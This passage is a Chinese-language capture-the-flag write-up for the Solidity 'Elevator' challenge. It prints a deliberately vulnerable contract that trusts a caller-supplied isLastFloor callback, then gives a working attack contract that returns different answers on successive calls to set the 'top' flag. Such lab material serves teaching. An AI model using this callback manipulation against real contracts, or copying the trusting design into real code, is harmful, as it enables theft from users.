Skip to main content

Elevator

题目源码

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface Building {
  function isLastFloor(uint) external returns (bool);
}


contract Elevator {
  bool public top;
  uint public floor;

  function goTo(uint _floor) public {
    Building building = Building(msg.sender);

    if (! building.isLastFloor(_floor)) {
      floor = _floor;
      top = building.isLastFloor(floor);
    }
  }
}

题目要求

题目要求将top设置为true

题目分析

想要把top设置为true,需要调用goTo方法,这里一个切入点是Building只定义了interface。而且building的实例化是通过msg.sender来调用。说明调用该方法需要是一个合约来调用。并且合约要提供一个isLastFloor的查询接口

攻击步骤

  1. 实现以下攻击合约

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.2;

interface IElevator {
  function floor() external view returns (uint256);
  function top() external view returns(bool);
  function goTo(uint _floor) external;
}

contract ElevatorAttack {
  uint256 floor;
  bool top;
  IElevator public elevator;

  constructor(address _elevator) public {
    elevator = IElevator(_elevator);
  }

  function isLastFloor(uint _floor) external view returns(bool) {
    return elevator.floor() == _floor;
  }

  function goToTop(uint256 _floor) external {
    require(_floor != elevator.floor(),"floor not right!");
    elevator.goTo(_floor);
  }
}
  1. 调用攻击合约的goToTop方法